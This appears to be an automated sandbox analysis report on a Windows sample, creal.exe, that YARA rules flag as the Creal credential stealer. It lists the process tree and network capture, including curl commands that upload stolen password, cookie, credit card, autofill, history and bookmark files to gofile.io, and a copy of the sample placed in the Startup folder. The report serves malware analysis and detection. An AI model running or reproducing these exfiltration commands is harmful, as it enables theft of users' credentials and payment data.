                                                                                                                                                                                                              2025-01-16 08:09:42 UTC195OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 63 64 35 66 32 33 39 38 34 39 61 33 61 32 36 65 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 63 72 63 72 65 64 69 74 63 61 72 64 73 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 70 6c 61 69 6e 0d 0a 0d 0a 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 63 64 35 66 32 33 39 38 34 39 61 33 61 32 36 65 2d 2d 0d 0a
                                                                                                                                                                                                              Data Ascii: --------------------------cd5f239849a3a26eContent-Disposition: form-data; name="file"; filename="crcreditcards.txt"Content-Type: text/plain--------------------------cd5f239849a3a26e--
                                                                                                                                                                                                              2025-01-16 08:09:43 UTC449INHTTP/1.1 200 OK
                                                                                                                                                                                                              Server: nginx/1.27.1
                                                                                                                                                                                                              Date: Thu, 16 Jan 2025 08:09:42 GMT
                                                                                                                                                                                                              Content-Type: application/json
                                                                                                                                                                                                              Content-Length: 749
                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                              Access-Control-Allow-Headers: Accept, Accept-Language, Content-Language, Content-Type, Content-Length, Range, Authorization
                                                                                                                                                                                                              Access-Control-Allow-Methods: POST, GET, OPTIONS, PUT, DELETE
                                                                                                                                                                                                              Access-Control-Allow-Origin: *
                                                                                                                                                                                                              Access-Control-Expose-Headers: Cache-Control, Content-Encoding, Content-Range
                                                                                                                                                                                                              2025-01-16 08:09:43 UTC749INData Raw: 7b 22 64 61 74 61 22 3a 7b 22 63 72 65 61 74 65 54 69 6d 65 22 3a 31 37 33 37 30 31 34 39 38 32 2c 22 64 6f 77 6e 6c 6f 61 64 50 61 67 65 22 3a 22 68 74 74 70 73 3a 2f 2f 67 6f 66 69 6c 65 2e 69 6f 2f 64 2f 6a 47 6c 46 31 4e 22 2c 22 67 75 65 73 74 54 6f 6b 65 6e 22 3a 22 4b 6d 4e 57 35 59 69 72 36 7a 56 63 30 6b 76 52 74 70 4e 66 4e 56 38 72 57 43 66 5a 37 36 46 73 22 2c 22 69 64 22 3a 22 65 37 32 33 36 64 35 64 2d 62 32 36 39 2d 34 65 66 39 2d 38 38 37 33 2d 30 64 61 64 66 64 62 66 39 32 34 35 22 2c 22 6d 64 35 22 3a 22 64 34 31 64 38 63 64 39 38 66 30 30 62 32 30 34 65 39 38 30 30 39 39 38 65 63 66 38 34 32 37 65 22 2c 22 6d 69 6d 65 74 79 70 65 22 3a 22 74 65 78 74 2f 70 6c 61 69 6e 22 2c 22 6d 6f 64 54 69 6d 65 22 3a 31 37 33 37 30 31 34 39 38 32 2c
                                                                                                                                                                                                              Data Ascii: {"data":{"createTime":1737014982,"downloadPage":"https://gofile.io/d/jGlF1N","guestToken":"KmNW5Yir6zVc0kvRtpNfNV8rWCfZ76Fs","id":"e7236d5d-b269-4ef9-8873-0dadfdbf9245","md5":"d41d8cd98f00b204e9800998ecf8427e","mimetype":"text/plain","modTime":1737014982,


                                                                                                                                                                                                              Statistics

                                                                                                                                                                                                              CPU Usage

                                                                                                                                                                                                              Click to jump to process

                                                                                                                                                                                                              Memory Usage

                                                                                                                                                                                                              Click to jump to process

                                                                                                                                                                                                              High Level Behavior Distribution

                                                                                                                                                                                                              Click to dive into process behavior distribution

                                                                                                                                                                                                              Behavior

                                                                                                                                                                                                              Click to jump to process

                                                                                                                                                                                                              System Behavior

                                                                                                                                                                                                              General

                                                                                                                                                                                                              Target ID:0
                                                                                                                                                                                                              Start time:03:09:09
                                                                                                                                                                                                              Start date:16/01/2025
                                                                                                                                                                                                              Path:C:\Users\user\Desktop\creal.exe
                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                              Commandline:"C:\Users\user\Desktop\creal.exe"
                                                                                                                                                                                                              Imagebase:0x7ff67a600000
                                                                                                                                                                                                              File size:17'171'619 bytes
                                                                                                                                                                                                              MD5 hash:DA1695DBA8BD25D00E05E7769D6D7E8E
                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                              General

                                                                                                                                                                                                              Target ID:2
                                                                                                                                                                                                              Start time:03:09:12
                                                                                                                                                                                                              Start date:16/01/2025
                                                                                                                                                                                                              Path:C:\Users\user\Desktop\creal.exe
                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                              Commandline:"C:\Users\user\Desktop\creal.exe"
                                                                                                                                                                                                              Imagebase:0x7ff67a600000
                                                                                                                                                                                                              File size:17'171'619 bytes
                                                                                                                                                                                                              MD5 hash:DA1695DBA8BD25D00E05E7769D6D7E8E
                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                              Yara matches:
                                                                                                                                                                                                              • Rule: JoeSecurity_GenericPythonStealer, Description: Yara detected Generic Python Stealer, Source: 00000002.00000003.1457557096.00000185BBEFA000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                              • Rule: JoeSecurity_CrealStealer, Description: Yara detected Creal Stealer, Source: 00000002.00000003.1457557096.00000185BBEFA000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                              • Rule: JoeSecurity_CrealStealer, Description: Yara detected Creal Stealer, Source: 00000002.00000003.1530242051.00000185BC87D000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                              • Rule: JoeSecurity_CrealStealer, Description: Yara detected Creal Stealer, Source: 00000002.00000003.1506165356.00000185BBD8A000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                              • Rule: JoeSecurity_CrealStealer, Description: Yara detected Creal Stealer, Source: 00000002.00000002.1570834386.00000185BC87D000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                              • Rule: JoeSecurity_CrealStealer, Description: Yara detected Creal Stealer, Source: 00000002.00000003.1551554678.00000185BC84D000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                              • Rule: JoeSecurity_CrealStealer, Description: Yara detected Creal Stealer, Source: 00000002.00000003.1535265611.00000185BBDD4000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                              • Rule: JoeSecurity_CrealStealer, Description: Yara detected Creal Stealer, Source: 00000002.00000003.1506829823.00000185BBD8A000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                              • Rule: JoeSecurity_CrealStealer, Description: Yara detected Creal Stealer, Source: 00000002.00000003.1514358388.00000185BBDA3000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                              • Rule: JoeSecurity_CrealStealer, Description: Yara detected Creal Stealer, Source: 00000002.00000003.1546407514.00000185BBDF9000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                              • Rule: JoeSecurity_CrealStealer, Description: Yara detected Creal Stealer, Source: 00000002.00000003.1552635462.00000185BC84E000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                              • Rule: JoeSecurity_CrealStealer, Description: Yara detected Creal Stealer, Source: 00000002.00000002.1570617892.00000185BC84E000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                              • Rule: JoeSecurity_CrealStealer, Description: Yara detected Creal Stealer, Source: 00000002.00000003.1526078196.00000185BC87D000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                              • Rule: JoeSecurity_CrealStealer, Description: Yara detected Creal Stealer, Source: 00000002.00000003.1531149169.00000185BC84D000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                              • Rule: JoeSecurity_CrealStealer, Description: Yara detected Creal Stealer, Source: 00000002.00000003.1546301683.00000185BC84D000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                              • Rule: JoeSecurity_CrealStealer, Description: Yara detected Creal Stealer, Source: 00000002.00000003.1506773484.00000185BBF19000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                              • Rule: JoeSecurity_CrealStealer, Description: Yara detected Creal Stealer, Source: 00000002.00000003.1520628565.00000185BC84D000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                              • Rule: JoeSecurity_CrealStealer, Description: Yara detected Creal Stealer, Source: 00000002.00000003.1520628565.00000185BC87D000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                              • Rule: JoeSecurity_CrealStealer, Description: Yara detected Creal Stealer, Source: 00000002.00000002.1572256883.00000185BCF00000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                              • Rule: JoeSecurity_CrealStealer, Description: Yara detected Creal Stealer, Source: 00000002.00000003.1534840732.00000185BC84D000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                              • Rule: JoeSecurity_CrealStealer, Description: Yara detected Creal Stealer, Source: 00000002.00000003.1516736251.00000185BBDD3000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                              • Rule: JoeSecurity_GenericPythonStealer, Description: Yara detected Generic Python Stealer, Source: 00000002.00000003.1506165356.00000185BBEFA000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                              • Rule: JoeSecurity_CrealStealer, Description: Yara detected Creal Stealer, Source: 00000002.00000003.1506165356.00000185BBEFA000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                              • Rule: JoeSecurity_CrealStealer, Description: Yara detected Creal Stealer, Source: 00000002.00000003.1514920740.00000185BBDBD000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                              • Rule: JoeSecurity_CrealStealer, Description: Yara detected Creal Stealer, Source: 00000002.00000003.1542555830.00000185BC84D000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                              • Rule: JoeSecurity_CrealStealer, Description: Yara detected Creal Stealer, Source: 00000002.00000003.1551628084.00000185BC84D000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                              General

                                                                                                                                                                                                              Target ID:3
                                                                                                                                                                                                              Start time:03:09:13
                                                                                                                                                                                                              Start date:16/01/2025
                                                                                                                                                                                                              Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                              Commandline:C:\Windows\system32\cmd.exe /c "tasklist"
                                                                                                                                                                                                              Imagebase:0x7ff778450000
                                                                                                                                                                                                              File size:289'792 bytes
                                                                                                                                                                                                              MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                              Reputation:high
                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                              General

                                                                                                                                                                                                              Target ID:4
                                                                                                                                                                                                              Start time:03:09:13
                                                                                                                                                                                                              Start date:16/01/2025
                                                                                                                                                                                                              Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                              Imagebase:0x7ff70f010000
                                                                                                                                                                                                              File size:862'208 bytes
                                                                                                                                                                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                              Reputation:high
                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                              General

                                                                                                                                                                                                              Target ID:5
                                                                                                                                                                                                              Start time:03:09:13
                                                                                                                                                                                                              Start date:16/01/2025
                                                                                                                                                                                                              Path:C:\Windows\System32\tasklist.exe
                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                              Commandline:tasklist
                                                                                                                                                                                                              Imagebase:0x7ff7df590000
                                                                                                                                                                                                              File size:106'496 bytes
                                                                                                                                                                                                              MD5 hash:D0A49A170E13D7F6AEBBEFED9DF88AAA
                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                              Reputation:moderate
                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                              General

                                                                                                                                                                                                              Target ID:6
                                                                                                                                                                                                              Start time:03:09:18
                                                                                                                                                                                                              Start date:16/01/2025
                                                                                                                                                                                                              Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                              Commandline:C:\Windows\system32\cmd.exe /c "curl -F "file=@C:\Users\user\AppData\Local\Temp\crpasswords.txt" https://store4.gofile.io/uploadFile"
                                                                                                                                                                                                              Imagebase:0x7ff778450000
                                                                                                                                                                                                              File size:289'792 bytes
                                                                                                                                                                                                              MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                              Reputation:high
                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                              General

                                                                                                                                                                                                              Target ID:7
                                                                                                                                                                                                              Start time:03:09:18
                                                                                                                                                                                                              Start date:16/01/2025
                                                                                                                                                                                                              Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                              Imagebase:0x7ff70f010000
                                                                                                                                                                                                              File size:862'208 bytes
                                                                                                                                                                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                              Reputation:high
                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                              General

                                                                                                                                                                                                              Target ID:8
                                                                                                                                                                                                              Start time:03:09:18
                                                                                                                                                                                                              Start date:16/01/2025
                                                                                                                                                                                                              Path:C:\Windows\System32\curl.exe
                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                              Commandline:curl -F "file=@C:\Users\user\AppData\Local\Temp\crpasswords.txt" https://store4.gofile.io/uploadFile
                                                                                                                                                                                                              Imagebase:0x7ff60d430000
                                                                                                                                                                                                              File size:530'944 bytes
                                                                                                                                                                                                              MD5 hash:EAC53DDAFB5CC9E780A7CC086CE7B2B1
                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                              Reputation:moderate
                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                              General

                                                                                                                                                                                                              Target ID:9
                                                                                                                                                                                                              Start time:03:09:19
                                                                                                                                                                                                              Start date:16/01/2025
                                                                                                                                                                                                              Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                              Commandline:C:\Windows\system32\cmd.exe /c "curl -F "file=@C:\Users\user\AppData\Local\Temp\crcookies.txt" https://store4.gofile.io/uploadFile"
                                                                                                                                                                                                              Imagebase:0x7ff778450000
                                                                                                                                                                                                              File size:289'792 bytes
                                                                                                                                                                                                              MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                              Reputation:high
                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                              General

                                                                                                                                                                                                              Target ID:10
                                                                                                                                                                                                              Start time:03:09:19
                                                                                                                                                                                                              Start date:16/01/2025
                                                                                                                                                                                                              Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                              Imagebase:0x7ff70f010000
                                                                                                                                                                                                              File size:862'208 bytes
                                                                                                                                                                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                              Reputation:high
                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                              General

                                                                                                                                                                                                              Target ID:11
                                                                                                                                                                                                              Start time:03:09:19
                                                                                                                                                                                                              Start date:16/01/2025
                                                                                                                                                                                                              Path:C:\Windows\System32\curl.exe
                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                              Commandline:curl -F "file=@C:\Users\user\AppData\Local\Temp\crcookies.txt" https://store4.gofile.io/uploadFile
                                                                                                                                                                                                              Imagebase:0x7ff60d430000
                                                                                                                                                                                                              File size:530'944 bytes
                                                                                                                                                                                                              MD5 hash:EAC53DDAFB5CC9E780A7CC086CE7B2B1
                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                              Reputation:moderate
                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                              General

                                                                                                                                                                                                              Target ID:12
                                                                                                                                                                                                              Start time:03:09:21
                                                                                                                                                                                                              Start date:16/01/2025
                                                                                                                                                                                                              Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                              Commandline:C:\Windows\system32\cmd.exe /c "curl -F "file=@C:\Users\user\AppData\Local\Temp\crcreditcards.txt" https://store4.gofile.io/uploadFile"
                                                                                                                                                                                                              Imagebase:0x7ff778450000
                                                                                                                                                                                                              File size:289'792 bytes
                                                                                                                                                                                                              MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                              Reputation:high
                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                              General

                                                                                                                                                                                                              Target ID:13
                                                                                                                                                                                                              Start time:03:09:21
                                                                                                                                                                                                              Start date:16/01/2025
                                                                                                                                                                                                              Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                              Imagebase:0x7ff70f010000
                                                                                                                                                                                                              File size:862'208 bytes
                                                                                                                                                                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                              General

                                                                                                                                                                                                              Target ID:14
                                                                                                                                                                                                              Start time:03:09:21
                                                                                                                                                                                                              Start date:16/01/2025
                                                                                                                                                                                                              Path:C:\Windows\System32\curl.exe
                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                              Commandline:curl -F "file=@C:\Users\user\AppData\Local\Temp\crcreditcards.txt" https://store4.gofile.io/uploadFile
                                                                                                                                                                                                              Imagebase:0x7ff60d430000
                                                                                                                                                                                                              File size:530'944 bytes
                                                                                                                                                                                                              MD5 hash:EAC53DDAFB5CC9E780A7CC086CE7B2B1
                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                              General

                                                                                                                                                                                                              Target ID:15
                                                                                                                                                                                                              Start time:03:09:22
                                                                                                                                                                                                              Start date:16/01/2025
                                                                                                                                                                                                              Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                              Commandline:C:\Windows\system32\cmd.exe /c "curl -F "file=@C:\Users\user\AppData\Local\Temp\crautofills.txt" https://store4.gofile.io/uploadFile"
                                                                                                                                                                                                              Imagebase:0x7ff778450000
                                                                                                                                                                                                              File size:289'792 bytes
                                                                                                                                                                                                              MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                              General

                                                                                                                                                                                                              Target ID:16
                                                                                                                                                                                                              Start time:03:09:22
                                                                                                                                                                                                              Start date:16/01/2025
                                                                                                                                                                                                              Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                              Imagebase:0x7ff70f010000
                                                                                                                                                                                                              File size:862'208 bytes
                                                                                                                                                                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                              General

                                                                                                                                                                                                              Target ID:17
                                                                                                                                                                                                              Start time:03:09:22
                                                                                                                                                                                                              Start date:16/01/2025
                                                                                                                                                                                                              Path:C:\Windows\System32\curl.exe
                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                              Commandline:curl -F "file=@C:\Users\user\AppData\Local\Temp\crautofills.txt" https://store4.gofile.io/uploadFile
                                                                                                                                                                                                              Imagebase:0x7ff60d430000
                                                                                                                                                                                                              File size:530'944 bytes
                                                                                                                                                                                                              MD5 hash:EAC53DDAFB5CC9E780A7CC086CE7B2B1
                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                              General

                                                                                                                                                                                                              Target ID:18
                                                                                                                                                                                                              Start time:03:09:22
                                                                                                                                                                                                              Start date:16/01/2025
                                                                                                                                                                                                              Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                              Commandline:C:\Windows\system32\cmd.exe /c "curl -F "file=@C:\Users\user\AppData\Local\Temp\crhistories.txt" https://store4.gofile.io/uploadFile"
                                                                                                                                                                                                              Imagebase:0x7ff778450000
                                                                                                                                                                                                              File size:289'792 bytes
                                                                                                                                                                                                              MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                              General

                                                                                                                                                                                                              Target ID:19
                                                                                                                                                                                                              Start time:03:09:22
                                                                                                                                                                                                              Start date:16/01/2025
                                                                                                                                                                                                              Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                              Imagebase:0x7ff70f010000
                                                                                                                                                                                                              File size:862'208 bytes
                                                                                                                                                                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                              General

                                                                                                                                                                                                              Target ID:20
                                                                                                                                                                                                              Start time:03:09:22
                                                                                                                                                                                                              Start date:16/01/2025
                                                                                                                                                                                                              Path:C:\Windows\System32\curl.exe
                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                              Commandline:curl -F "file=@C:\Users\user\AppData\Local\Temp\crhistories.txt" https://store4.gofile.io/uploadFile
                                                                                                                                                                                                              Imagebase:0x7ff60d430000
                                                                                                                                                                                                              File size:530'944 bytes
                                                                                                                                                                                                              MD5 hash:EAC53DDAFB5CC9E780A7CC086CE7B2B1
                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                              General

                                                                                                                                                                                                              Target ID:21
                                                                                                                                                                                                              Start time:03:09:22
                                                                                                                                                                                                              Start date:16/01/2025
                                                                                                                                                                                                              Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                              Commandline:C:\Windows\system32\cmd.exe /c "curl -F "file=@C:\Users\user\AppData\Local\Temp\crbookmarks.txt" https://store4.gofile.io/uploadFile"
                                                                                                                                                                                                              Imagebase:0x7ff778450000
                                                                                                                                                                                                              File size:289'792 bytes
                                                                                                                                                                                                              MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                              General

                                                                                                                                                                                                              Target ID:22
                                                                                                                                                                                                              Start time:03:09:22
                                                                                                                                                                                                              Start date:16/01/2025
                                                                                                                                                                                                              Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                              Imagebase:0x7ff70f010000
                                                                                                                                                                                                              File size:862'208 bytes
                                                                                                                                                                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                              General

                                                                                                                                                                                                              Target ID:24
                                                                                                                                                                                                              Start time:03:09:23
                                                                                                                                                                                                              Start date:16/01/2025
                                                                                                                                                                                                              Path:C:\Windows\System32\curl.exe
                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                              Commandline:curl -F "file=@C:\Users\user\AppData\Local\Temp\crbookmarks.txt" https://store4.gofile.io/uploadFile
                                                                                                                                                                                                              Imagebase:0x7ff60d430000
                                                                                                                                                                                                              File size:530'944 bytes
                                                                                                                                                                                                              MD5 hash:EAC53DDAFB5CC9E780A7CC086CE7B2B1
                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                              General

                                                                                                                                                                                                              Target ID:25
                                                                                                                                                                                                              Start time:03:09:24
                                                                                                                                                                                                              Start date:16/01/2025
                                                                                                                                                                                                              Path:C:\Windows\System32\dllhost.exe
                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                              Commandline:C:\Windows\system32\DllHost.exe /Processid:{F9717507-6651-4EDB-BFF7-AE615179BCCF}
                                                                                                                                                                                                              Imagebase:0x7ff733cd0000
                                                                                                                                                                                                              File size:21'312 bytes
                                                                                                                                                                                                              MD5 hash:08EB78E5BE019DF044C26B14703BD1FA
                                                                                                                                                                                                              Has elevated privileges:false
                                                                                                                                                                                                              Has administrator privileges:false
                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                              Has exited:false

                                                                                                                                                                                                              General

                                                                                                                                                                                                              Target ID:26
                                                                                                                                                                                                              Start time:03:09:25
                                                                                                                                                                                                              Start date:16/01/2025
                                                                                                                                                                                                              Path:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\creal.exe
                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                              Commandline:"C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\creal.exe"
                                                                                                                                                                                                              Imagebase:0x7ff7c3ce0000
                                                                                                                                                                                                              File size:17'171'619 bytes
                                                                                                                                                                                                              MD5 hash:DA1695DBA8BD25D00E05E7769D6D7E8E
                                                                                                                                                                                                              Has elevated privileges:false
                                                                                                                                                                                                              Has administrator privileges:false
                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                              Has exited:true

